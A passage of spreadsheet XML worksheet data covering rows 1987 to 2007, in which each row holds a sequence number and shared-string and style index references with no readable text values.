      <c r="I1987" s="46"/>
      <c r="J1987" s="46"/>
      <c r="K1987" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1987" s="46"/>
      <c r="M1987" s="46"/>
      <c r="N1987" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1987" s="46"/>
      <c r="P1987" s="46"/>
      <c r="Q1987" s="46"/>
      <c r="R1987" s="46"/>
      <c r="S1987" s="46"/>
      <c r="T1987" s="46"/>
      <c r="U1987" s="46"/>
      <c r="V1987" s="46"/>
      <c r="W1987" s="46"/>
      <c r="X1987" s="46"/>
      <c r="Y1987" s="46"/>
      <c r="Z1987" s="46"/>
      <c r="AA1987" s="46"/>
      <c r="AB1987" s="46"/>
      <c r="AC1987" s="46"/>
      <c r="AD1987" s="46"/>
      <c r="AE1987" s="46"/>
      <c r="AF1987" s="46"/>
      <c r="AG1987" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1987" s="46"/>
      <c r="AI1987" s="46"/>
      <c r="AJ1987" s="46"/>
    </row>
    <row r="1988" spans="1:36">
      <c r="A1988" s="42">
        <v>1987</v>
      </c>
      <c r="B1988" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1988" s="42" t="s">
        <v>2953</v>
      </c>
      <c r="D1988" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1988" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1988" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1988" s="46"/>
      <c r="H1988" s="46"/>
      <c r="I1988" s="46"/>
      <c r="J1988" s="46"/>
      <c r="K1988" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1988" s="46"/>
      <c r="M1988" s="46"/>
      <c r="N1988" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1988" s="46"/>
      <c r="P1988" s="46"/>
      <c r="Q1988" s="46"/>
      <c r="R1988" s="46"/>
      <c r="S1988" s="46"/>
      <c r="T1988" s="46"/>
      <c r="U1988" s="46"/>
      <c r="V1988" s="46"/>
      <c r="W1988" s="46"/>
      <c r="X1988" s="46"/>
      <c r="Y1988" s="46"/>
      <c r="Z1988" s="46"/>
      <c r="AA1988" s="46"/>
      <c r="AB1988" s="46"/>
      <c r="AC1988" s="46"/>
      <c r="AD1988" s="46"/>
      <c r="AE1988" s="46"/>
      <c r="AF1988" s="46"/>
      <c r="AG1988" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1988" s="46"/>
      <c r="AI1988" s="46"/>
      <c r="AJ1988" s="46"/>
    </row>
    <row r="1989" spans="1:36">
      <c r="A1989" s="42">
        <v>1988</v>
      </c>
      <c r="B1989" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1989" s="42" t="s">
        <v>2954</v>
      </c>
      <c r="D1989" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1989" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1989" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1989" s="46"/>
      <c r="H1989" s="46"/>
      <c r="I1989" s="46"/>
      <c r="J1989" s="46"/>
      <c r="K1989" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1989" s="46"/>
      <c r="M1989" s="46"/>
      <c r="N1989" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1989" s="46"/>
      <c r="P1989" s="46"/>
      <c r="Q1989" s="46"/>
      <c r="R1989" s="46"/>
      <c r="S1989" s="46"/>
      <c r="T1989" s="46"/>
      <c r="U1989" s="46"/>
      <c r="V1989" s="46"/>
      <c r="W1989" s="46"/>
      <c r="X1989" s="46"/>
      <c r="Y1989" s="46"/>
      <c r="Z1989" s="46"/>
      <c r="AA1989" s="46"/>
      <c r="AB1989" s="46"/>
      <c r="AC1989" s="46"/>
      <c r="AD1989" s="46"/>
      <c r="AE1989" s="46"/>
      <c r="AF1989" s="46"/>
      <c r="AG1989" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1989" s="46"/>
      <c r="AI1989" s="46"/>
      <c r="AJ1989" s="46"/>
    </row>
    <row r="1990" spans="1:36">
      <c r="A1990" s="42">
        <v>1989</v>
      </c>
      <c r="B1990" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1990" s="42" t="s">
        <v>2955</v>
      </c>
      <c r="D1990" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1990" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1990" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1990" s="46"/>
      <c r="H1990" s="46"/>
      <c r="I1990" s="46"/>
      <c r="J1990" s="46"/>
      <c r="K1990" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1990" s="46"/>
      <c r="M1990" s="46"/>
      <c r="N1990" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1990" s="46"/>
      <c r="P1990" s="46"/>
      <c r="Q1990" s="46"/>
      <c r="R1990" s="46"/>
      <c r="S1990" s="46"/>
      <c r="T1990" s="46"/>
      <c r="U1990" s="46"/>
      <c r="V1990" s="46"/>
      <c r="W1990" s="46"/>
      <c r="X1990" s="46"/>
      <c r="Y1990" s="46"/>
      <c r="Z1990" s="46"/>
      <c r="AA1990" s="46"/>
      <c r="AB1990" s="46"/>
      <c r="AC1990" s="46"/>
      <c r="AD1990" s="46"/>
      <c r="AE1990" s="46"/>
      <c r="AF1990" s="46"/>
      <c r="AG1990" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1990" s="46"/>
      <c r="AI1990" s="46"/>
      <c r="AJ1990" s="46"/>
    </row>
    <row r="1991" spans="1:36">
      <c r="A1991" s="42">
        <v>1990</v>
      </c>
      <c r="B1991" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1991" s="42" t="s">
        <v>2956</v>
      </c>
      <c r="D1991" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1991" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1991" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1991" s="46"/>
      <c r="H1991" s="46"/>
      <c r="I1991" s="46"/>
      <c r="J1991" s="46"/>
      <c r="K1991" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1991" s="46"/>
      <c r="M1991" s="46"/>
      <c r="N1991" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1991" s="46"/>
      <c r="P1991" s="46"/>
      <c r="Q1991" s="46"/>
      <c r="R1991" s="46"/>
      <c r="S1991" s="46"/>
      <c r="T1991" s="46"/>
      <c r="U1991" s="46"/>
      <c r="V1991" s="46"/>
      <c r="W1991" s="46"/>
      <c r="X1991" s="46"/>
      <c r="Y1991" s="46"/>
      <c r="Z1991" s="46"/>
      <c r="AA1991" s="46"/>
      <c r="AB1991" s="46"/>
      <c r="AC1991" s="46"/>
      <c r="AD1991" s="46"/>
      <c r="AE1991" s="46"/>
      <c r="AF1991" s="46"/>
      <c r="AG1991" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1991" s="46"/>
      <c r="AI1991" s="46"/>
      <c r="AJ1991" s="46"/>
    </row>
    <row r="1992" spans="1:36">
      <c r="A1992" s="42">
        <v>1991</v>
      </c>
      <c r="B1992" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1992" s="42" t="s">
        <v>2957</v>
      </c>
      <c r="D1992" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1992" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1992" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1992" s="46"/>
      <c r="H1992" s="46"/>
      <c r="I1992" s="46"/>
      <c r="J1992" s="46"/>
      <c r="K1992" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1992" s="46"/>
      <c r="M1992" s="46"/>
      <c r="N1992" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1992" s="46"/>
      <c r="P1992" s="46"/>
      <c r="Q1992" s="46"/>
      <c r="R1992" s="46"/>
      <c r="S1992" s="46"/>
      <c r="T1992" s="46"/>
      <c r="U1992" s="46"/>
      <c r="V1992" s="46"/>
      <c r="W1992" s="46"/>
      <c r="X1992" s="46"/>
      <c r="Y1992" s="46"/>
      <c r="Z1992" s="46"/>
      <c r="AA1992" s="46"/>
      <c r="AB1992" s="46"/>
      <c r="AC1992" s="46"/>
      <c r="AD1992" s="46"/>
      <c r="AE1992" s="46"/>
      <c r="AF1992" s="46"/>
      <c r="AG1992" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1992" s="46"/>
      <c r="AI1992" s="46"/>
      <c r="AJ1992" s="46"/>
    </row>
    <row r="1993" spans="1:36">
      <c r="A1993" s="42">
        <v>1992</v>
      </c>
      <c r="B1993" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1993" s="42" t="s">
        <v>2958</v>
      </c>
      <c r="D1993" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1993" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1993" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1993" s="46"/>
      <c r="H1993" s="46"/>
      <c r="I1993" s="46"/>
      <c r="J1993" s="46"/>
      <c r="K1993" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1993" s="46"/>
      <c r="M1993" s="46"/>
      <c r="N1993" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1993" s="46"/>
      <c r="P1993" s="46"/>
      <c r="Q1993" s="46"/>
      <c r="R1993" s="46"/>
      <c r="S1993" s="46"/>
      <c r="T1993" s="46"/>
      <c r="U1993" s="46"/>
      <c r="V1993" s="46"/>
      <c r="W1993" s="46"/>
      <c r="X1993" s="46"/>
      <c r="Y1993" s="46"/>
      <c r="Z1993" s="46"/>
      <c r="AA1993" s="46"/>
      <c r="AB1993" s="46"/>
      <c r="AC1993" s="46"/>
      <c r="AD1993" s="46"/>
      <c r="AE1993" s="46"/>
      <c r="AF1993" s="46"/>
      <c r="AG1993" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1993" s="46"/>
      <c r="AI1993" s="46"/>
      <c r="AJ1993" s="46"/>
    </row>
    <row r="1994" spans="1:36">
      <c r="A1994" s="42">
        <v>1993</v>
      </c>
      <c r="B1994" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1994" s="42" t="s">
        <v>2959</v>
      </c>
      <c r="D1994" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1994" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1994" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1994" s="46"/>
      <c r="H1994" s="46"/>
      <c r="I1994" s="46"/>
      <c r="J1994" s="46"/>
      <c r="K1994" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1994" s="46"/>
      <c r="M1994" s="46"/>
      <c r="N1994" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1994" s="46"/>
      <c r="P1994" s="46"/>
      <c r="Q1994" s="46"/>
      <c r="R1994" s="46"/>
      <c r="S1994" s="46"/>
      <c r="T1994" s="46"/>
      <c r="U1994" s="46"/>
      <c r="V1994" s="46"/>
      <c r="W1994" s="46"/>
      <c r="X1994" s="46"/>
      <c r="Y1994" s="46"/>
      <c r="Z1994" s="46"/>
      <c r="AA1994" s="46"/>
      <c r="AB1994" s="46"/>
      <c r="AC1994" s="46"/>
      <c r="AD1994" s="46"/>
      <c r="AE1994" s="46"/>
      <c r="AF1994" s="46"/>
      <c r="AG1994" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1994" s="46"/>
      <c r="AI1994" s="46"/>
      <c r="AJ1994" s="46"/>
    </row>
    <row r="1995" spans="1:36">
      <c r="A1995" s="42">
        <v>1994</v>
      </c>
      <c r="B1995" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1995" s="42" t="s">
        <v>2960</v>
      </c>
      <c r="D1995" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1995" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1995" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1995" s="46"/>
      <c r="H1995" s="46"/>
      <c r="I1995" s="46"/>
      <c r="J1995" s="46"/>
      <c r="K1995" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1995" s="46"/>
      <c r="M1995" s="46"/>
      <c r="N1995" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1995" s="46"/>
      <c r="P1995" s="46"/>
      <c r="Q1995" s="46"/>
      <c r="R1995" s="46"/>
      <c r="S1995" s="46"/>
      <c r="T1995" s="46"/>
      <c r="U1995" s="46"/>
      <c r="V1995" s="46"/>
      <c r="W1995" s="46"/>
      <c r="X1995" s="46"/>
      <c r="Y1995" s="46"/>
      <c r="Z1995" s="46"/>
      <c r="AA1995" s="46"/>
      <c r="AB1995" s="46"/>
      <c r="AC1995" s="46"/>
      <c r="AD1995" s="46"/>
      <c r="AE1995" s="46"/>
      <c r="AF1995" s="46"/>
      <c r="AG1995" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1995" s="46"/>
      <c r="AI1995" s="46"/>
      <c r="AJ1995" s="46"/>
    </row>
    <row r="1996" spans="1:36">
      <c r="A1996" s="42">
        <v>1995</v>
      </c>
      <c r="B1996" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1996" s="42" t="s">
        <v>2961</v>
      </c>
      <c r="D1996" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1996" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1996" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1996" s="46"/>
      <c r="H1996" s="46"/>
      <c r="I1996" s="46"/>
      <c r="J1996" s="46"/>
      <c r="K1996" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1996" s="46"/>
      <c r="M1996" s="46"/>
      <c r="N1996" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1996" s="46"/>
      <c r="P1996" s="46"/>
      <c r="Q1996" s="46"/>
      <c r="R1996" s="46"/>
      <c r="S1996" s="46"/>
      <c r="T1996" s="46"/>
      <c r="U1996" s="46"/>
      <c r="V1996" s="46"/>
      <c r="W1996" s="46"/>
      <c r="X1996" s="46"/>
      <c r="Y1996" s="46"/>
      <c r="Z1996" s="46"/>
      <c r="AA1996" s="46"/>
      <c r="AB1996" s="46"/>
      <c r="AC1996" s="46"/>
      <c r="AD1996" s="46"/>
      <c r="AE1996" s="46"/>
      <c r="AF1996" s="46"/>
      <c r="AG1996" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1996" s="46"/>
      <c r="AI1996" s="46"/>
      <c r="AJ1996" s="46"/>
    </row>
    <row r="1997" spans="1:36">
      <c r="A1997" s="42">
        <v>1996</v>
      </c>
      <c r="B1997" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1997" s="42" t="s">
        <v>2962</v>
      </c>
      <c r="D1997" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1997" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1997" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1997" s="46"/>
      <c r="H1997" s="46"/>
      <c r="I1997" s="46"/>
      <c r="J1997" s="46"/>
      <c r="K1997" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1997" s="46"/>
      <c r="M1997" s="46"/>
      <c r="N1997" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1997" s="46"/>
      <c r="P1997" s="46"/>
      <c r="Q1997" s="46"/>
      <c r="R1997" s="46"/>
      <c r="S1997" s="46"/>
      <c r="T1997" s="46"/>
      <c r="U1997" s="46"/>
      <c r="V1997" s="46"/>
      <c r="W1997" s="46"/>
      <c r="X1997" s="46"/>
      <c r="Y1997" s="46"/>
      <c r="Z1997" s="46"/>
      <c r="AA1997" s="46"/>
      <c r="AB1997" s="46"/>
      <c r="AC1997" s="46"/>
      <c r="AD1997" s="46"/>
      <c r="AE1997" s="46"/>
      <c r="AF1997" s="46"/>
      <c r="AG1997" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1997" s="46"/>
      <c r="AI1997" s="46"/>
      <c r="AJ1997" s="46"/>
    </row>
    <row r="1998" spans="1:36">
      <c r="A1998" s="42">
        <v>1997</v>
      </c>
      <c r="B1998" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1998" s="42" t="s">
        <v>2963</v>
      </c>
      <c r="D1998" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1998" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1998" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1998" s="46"/>
      <c r="H1998" s="46"/>
      <c r="I1998" s="46"/>
      <c r="J1998" s="46"/>
      <c r="K1998" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1998" s="46"/>
      <c r="M1998" s="46"/>
      <c r="N1998" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1998" s="46"/>
      <c r="P1998" s="46"/>
      <c r="Q1998" s="46"/>
      <c r="R1998" s="46"/>
      <c r="S1998" s="46"/>
      <c r="T1998" s="46"/>
      <c r="U1998" s="46"/>
      <c r="V1998" s="46"/>
      <c r="W1998" s="46"/>
      <c r="X1998" s="46"/>
      <c r="Y1998" s="46"/>
      <c r="Z1998" s="46"/>
      <c r="AA1998" s="46"/>
      <c r="AB1998" s="46"/>
      <c r="AC1998" s="46"/>
      <c r="AD1998" s="46"/>
      <c r="AE1998" s="46"/>
      <c r="AF1998" s="46"/>
      <c r="AG1998" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1998" s="46"/>
      <c r="AI1998" s="46"/>
      <c r="AJ1998" s="46"/>
    </row>
    <row r="1999" spans="1:36">
      <c r="A1999" s="42">
        <v>1998</v>
      </c>
      <c r="B1999" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C1999" s="42" t="s">
        <v>2964</v>
      </c>
      <c r="D1999" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E1999" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F1999" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G1999" s="46"/>
      <c r="H1999" s="46"/>
      <c r="I1999" s="46"/>
      <c r="J1999" s="46"/>
      <c r="K1999" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L1999" s="46"/>
      <c r="M1999" s="46"/>
      <c r="N1999" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O1999" s="46"/>
      <c r="P1999" s="46"/>
      <c r="Q1999" s="46"/>
      <c r="R1999" s="46"/>
      <c r="S1999" s="46"/>
      <c r="T1999" s="46"/>
      <c r="U1999" s="46"/>
      <c r="V1999" s="46"/>
      <c r="W1999" s="46"/>
      <c r="X1999" s="46"/>
      <c r="Y1999" s="46"/>
      <c r="Z1999" s="46"/>
      <c r="AA1999" s="46"/>
      <c r="AB1999" s="46"/>
      <c r="AC1999" s="46"/>
      <c r="AD1999" s="46"/>
      <c r="AE1999" s="46"/>
      <c r="AF1999" s="46"/>
      <c r="AG1999" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH1999" s="46"/>
      <c r="AI1999" s="46"/>
      <c r="AJ1999" s="46"/>
    </row>
    <row r="2000" spans="1:36">
      <c r="A2000" s="42">
        <v>1999</v>
      </c>
      <c r="B2000" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2000" s="42" t="s">
        <v>2965</v>
      </c>
      <c r="D2000" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2000" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2000" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2000" s="46"/>
      <c r="H2000" s="46"/>
      <c r="I2000" s="46"/>
      <c r="J2000" s="46"/>
      <c r="K2000" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2000" s="46"/>
      <c r="M2000" s="46"/>
      <c r="N2000" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2000" s="46"/>
      <c r="P2000" s="46"/>
      <c r="Q2000" s="46"/>
      <c r="R2000" s="46"/>
      <c r="S2000" s="46"/>
      <c r="T2000" s="46"/>
      <c r="U2000" s="46"/>
      <c r="V2000" s="46"/>
      <c r="W2000" s="46"/>
      <c r="X2000" s="46"/>
      <c r="Y2000" s="46"/>
      <c r="Z2000" s="46"/>
      <c r="AA2000" s="46"/>
      <c r="AB2000" s="46"/>
      <c r="AC2000" s="46"/>
      <c r="AD2000" s="46"/>
      <c r="AE2000" s="46"/>
      <c r="AF2000" s="46"/>
      <c r="AG2000" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2000" s="46"/>
      <c r="AI2000" s="46"/>
      <c r="AJ2000" s="46"/>
    </row>
    <row r="2001" spans="1:36">
      <c r="A2001" s="42">
        <v>2000</v>
      </c>
      <c r="B2001" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2001" s="42" t="s">
        <v>2966</v>
      </c>
      <c r="D2001" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2001" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2001" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2001" s="46"/>
      <c r="H2001" s="46"/>
      <c r="I2001" s="46"/>
      <c r="J2001" s="46"/>
      <c r="K2001" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2001" s="46"/>
      <c r="M2001" s="46"/>
      <c r="N2001" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2001" s="46"/>
      <c r="P2001" s="46"/>
      <c r="Q2001" s="46"/>
      <c r="R2001" s="46"/>
      <c r="S2001" s="46"/>
      <c r="T2001" s="46"/>
      <c r="U2001" s="46"/>
      <c r="V2001" s="46"/>
      <c r="W2001" s="46"/>
      <c r="X2001" s="46"/>
      <c r="Y2001" s="46"/>
      <c r="Z2001" s="46"/>
      <c r="AA2001" s="46"/>
      <c r="AB2001" s="46"/>
      <c r="AC2001" s="46"/>
      <c r="AD2001" s="46"/>
      <c r="AE2001" s="46"/>
      <c r="AF2001" s="46"/>
      <c r="AG2001" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2001" s="46"/>
      <c r="AI2001" s="46"/>
      <c r="AJ2001" s="46"/>
    </row>
    <row r="2002" spans="1:36">
      <c r="A2002" s="42">
        <v>2001</v>
      </c>
      <c r="B2002" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2002" s="42" t="s">
        <v>2967</v>
      </c>
      <c r="D2002" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2002" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2002" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2002" s="46"/>
      <c r="H2002" s="46"/>
      <c r="I2002" s="46"/>
      <c r="J2002" s="46"/>
      <c r="K2002" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2002" s="46"/>
      <c r="M2002" s="46"/>
      <c r="N2002" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2002" s="46"/>
      <c r="P2002" s="46"/>
      <c r="Q2002" s="46"/>
      <c r="R2002" s="46"/>
      <c r="S2002" s="46"/>
      <c r="T2002" s="46"/>
      <c r="U2002" s="46"/>
      <c r="V2002" s="46"/>
      <c r="W2002" s="46"/>
      <c r="X2002" s="46"/>
      <c r="Y2002" s="46"/>
      <c r="Z2002" s="46"/>
      <c r="AA2002" s="46"/>
      <c r="AB2002" s="46"/>
      <c r="AC2002" s="46"/>
      <c r="AD2002" s="46"/>
      <c r="AE2002" s="46"/>
      <c r="AF2002" s="46"/>
      <c r="AG2002" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2002" s="46"/>
      <c r="AI2002" s="46"/>
      <c r="AJ2002" s="46"/>
    </row>
    <row r="2003" spans="1:36">
      <c r="A2003" s="42">
        <v>2002</v>
      </c>
      <c r="B2003" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2003" s="42" t="s">
        <v>2968</v>
      </c>
      <c r="D2003" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2003" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2003" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2003" s="46"/>
      <c r="H2003" s="46"/>
      <c r="I2003" s="46"/>
      <c r="J2003" s="46"/>
      <c r="K2003" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2003" s="46"/>
      <c r="M2003" s="46"/>
      <c r="N2003" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2003" s="46"/>
      <c r="P2003" s="46"/>
      <c r="Q2003" s="46"/>
      <c r="R2003" s="46"/>
      <c r="S2003" s="46"/>
      <c r="T2003" s="46"/>
      <c r="U2003" s="46"/>
      <c r="V2003" s="46"/>
      <c r="W2003" s="46"/>
      <c r="X2003" s="46"/>
      <c r="Y2003" s="46"/>
      <c r="Z2003" s="46"/>
      <c r="AA2003" s="46"/>
      <c r="AB2003" s="46"/>
      <c r="AC2003" s="46"/>
      <c r="AD2003" s="46"/>
      <c r="AE2003" s="46"/>
      <c r="AF2003" s="46"/>
      <c r="AG2003" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2003" s="46"/>
      <c r="AI2003" s="46"/>
      <c r="AJ2003" s="46"/>
    </row>
    <row r="2004" spans="1:36">
      <c r="A2004" s="42">
        <v>2003</v>
      </c>
      <c r="B2004" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2004" s="42" t="s">
        <v>2969</v>
      </c>
      <c r="D2004" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2004" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2004" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2004" s="46"/>
      <c r="H2004" s="46"/>
      <c r="I2004" s="46"/>
      <c r="J2004" s="46"/>
      <c r="K2004" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2004" s="46"/>
      <c r="M2004" s="46"/>
      <c r="N2004" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2004" s="46"/>
      <c r="P2004" s="46"/>
      <c r="Q2004" s="46"/>
      <c r="R2004" s="46"/>
      <c r="S2004" s="46"/>
      <c r="T2004" s="46"/>
      <c r="U2004" s="46"/>
      <c r="V2004" s="46"/>
      <c r="W2004" s="46"/>
      <c r="X2004" s="46"/>
      <c r="Y2004" s="46"/>
      <c r="Z2004" s="46"/>
      <c r="AA2004" s="46"/>
      <c r="AB2004" s="46"/>
      <c r="AC2004" s="46"/>
      <c r="AD2004" s="46"/>
      <c r="AE2004" s="46"/>
      <c r="AF2004" s="46"/>
      <c r="AG2004" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2004" s="46"/>
      <c r="AI2004" s="46"/>
      <c r="AJ2004" s="46"/>
    </row>
    <row r="2005" spans="1:36">
      <c r="A2005" s="42">
        <v>2004</v>
      </c>
      <c r="B2005" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2005" s="42" t="s">
        <v>2970</v>
      </c>
      <c r="D2005" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2005" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2005" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2005" s="46"/>
      <c r="H2005" s="46"/>
      <c r="I2005" s="46"/>
      <c r="J2005" s="46"/>
      <c r="K2005" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2005" s="46"/>
      <c r="M2005" s="46"/>
      <c r="N2005" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2005" s="46"/>
      <c r="P2005" s="46"/>
      <c r="Q2005" s="46"/>
      <c r="R2005" s="46"/>
      <c r="S2005" s="46"/>
      <c r="T2005" s="46"/>
      <c r="U2005" s="46"/>
      <c r="V2005" s="46"/>
      <c r="W2005" s="46"/>
      <c r="X2005" s="46"/>
      <c r="Y2005" s="46"/>
      <c r="Z2005" s="46"/>
      <c r="AA2005" s="46"/>
      <c r="AB2005" s="46"/>
      <c r="AC2005" s="46"/>
      <c r="AD2005" s="46"/>
      <c r="AE2005" s="46"/>
      <c r="AF2005" s="46"/>
      <c r="AG2005" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2005" s="46"/>
      <c r="AI2005" s="46"/>
      <c r="AJ2005" s="46"/>
    </row>
    <row r="2006" spans="1:36">
      <c r="A2006" s="42">
        <v>2005</v>
      </c>
      <c r="B2006" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2006" s="42" t="s">
        <v>2971</v>
      </c>
      <c r="D2006" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2006" s="42" t="s">
        <v>370</v>
      </c>
      <c r="F2006" s="43" t="s">
        <v>123</v>
      </c>
      <c r="G2006" s="46"/>
      <c r="H2006" s="46"/>
      <c r="I2006" s="46"/>
      <c r="J2006" s="46"/>
      <c r="K2006" s="42" t="s">
        <v>371</v>
      </c>
      <c r="L2006" s="46"/>
      <c r="M2006" s="46"/>
      <c r="N2006" s="42" t="s">
        <v>392</v>
      </c>
      <c r="O2006" s="46"/>
      <c r="P2006" s="46"/>
      <c r="Q2006" s="46"/>
      <c r="R2006" s="46"/>
      <c r="S2006" s="46"/>
      <c r="T2006" s="46"/>
      <c r="U2006" s="46"/>
      <c r="V2006" s="46"/>
      <c r="W2006" s="46"/>
      <c r="X2006" s="46"/>
      <c r="Y2006" s="46"/>
      <c r="Z2006" s="46"/>
      <c r="AA2006" s="46"/>
      <c r="AB2006" s="46"/>
      <c r="AC2006" s="46"/>
      <c r="AD2006" s="46"/>
      <c r="AE2006" s="46"/>
      <c r="AF2006" s="46"/>
      <c r="AG2006" s="45" t="s">
        <v>377</v>
      </c>
      <c r="AH2006" s="46"/>
      <c r="AI2006" s="46"/>
      <c r="AJ2006" s="46"/>
    </row>
    <row r="2007" spans="1:36">
      <c r="A2007" s="42">
        <v>2006</v>
      </c>
      <c r="B2007" s="42" t="s">
        <v>367</v>
      </c>
      <c r="C2007" s="42" t="s">
        <v>2972</v>
      </c>
      <c r="D2007" s="42" t="s">
        <v>369</v>
      </c>
      <c r="E2007" s="42" t="s">
        <v>370</v>
      </c>
